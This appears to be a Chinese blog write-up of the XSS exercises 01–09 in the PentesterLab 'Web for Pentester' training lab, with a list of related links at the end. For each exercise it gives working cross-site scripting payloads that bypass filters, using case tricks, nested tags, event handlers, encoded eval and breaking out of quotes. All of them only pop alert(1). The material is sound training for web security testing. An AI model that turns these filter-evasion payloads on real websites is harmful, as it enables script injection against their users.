Web for Pentester XSS Example 01-09
2014-07-23 10:34
323 查看
Ref:https://www.pentesterlab.com/exercises/web_for_pentester/
Dat:20140722
web for pentester是PentesterLib开发的众多渗透测试学习平台之一,通过该平台我们可以了解学习到常见的Web漏洞检测技术。
【Example 01】
无过滤
【Example 02】
大小写替换
【Example 03】
多余属性
【Example 04】
变换标签
【Example 05】
EVAL
标签变换+进制
【Example 06】
标签闭合
【Example 07】
标签闭合
【Example 08】
标签form属性利用
【Example 09】
location.hash利用
Dat:20140722
web for pentester是PentesterLib开发的众多渗透测试学习平台之一,通过该平台我们可以了解学习到常见的Web漏洞检测技术。
【Example 01】
无过滤
<script>alert(1)</script>
【Example 02】
大小写替换
<sCript>alert(1)</scRipt>
【Example 03】
多余属性
<script/b>alert(1)</script/a> <sc<script>ript>alert(1)</scr</script>ipt>
【Example 04】
变换标签
<img onerror=alert(1) src=a> <a onmouseover=alert(1)> <div onmouseover=alert(1)>
【Example 05】
EVAL
<script>eval('a\154ert(1)')</script> <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script> <script>eval(atob('YWxlcnQoMSk='))</script>
标签变换+进制
<img onerror=al\u0065rt(1) src=a>
【Example 06】
标签闭合
";alert(1);"
【Example 07】
标签闭合
';alert(1);'
【Example 08】
标签form属性利用
example8.php/" ><script>alert(1)</script><"
【Example 09】
location.hash利用
example9.php#<script>alert(1)</script>
相关文章推荐
- web for pentester XSS部分练习
- web for pentester XSS部分练习
- Workflow WF Reference Links for 2009-01-09
- x01.SportWeb: An Example for AspNetCore 2.0
- good example for web automation and exe automation
- Pentester Lab学习计划之Web for Pentester II
- Web for Pentester II练习题解
- Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing
- 【web安全】第三弹:web攻防平台pentester安装及XSS部分答案解析
- 【渗透测试学习平台】 web for pentester -7.文件包含
- Web Vulnerability Scanner 7.0 Patch for 2010_09_21_01
- Web For Pentester 阅读笔记(3)
- A XSS filter for Java EE web apps--转载
- Example-09-01
- 【渗透测试学习平台】 web for pentester -8.XML
- Web for Pentester官网
- 【渗透测试学习平台】 web for pentester -3.XSS
- 菜鸟写jquery入门教程(for web前端开发群4)(01)
- 渗透测试学习平台-web for pentester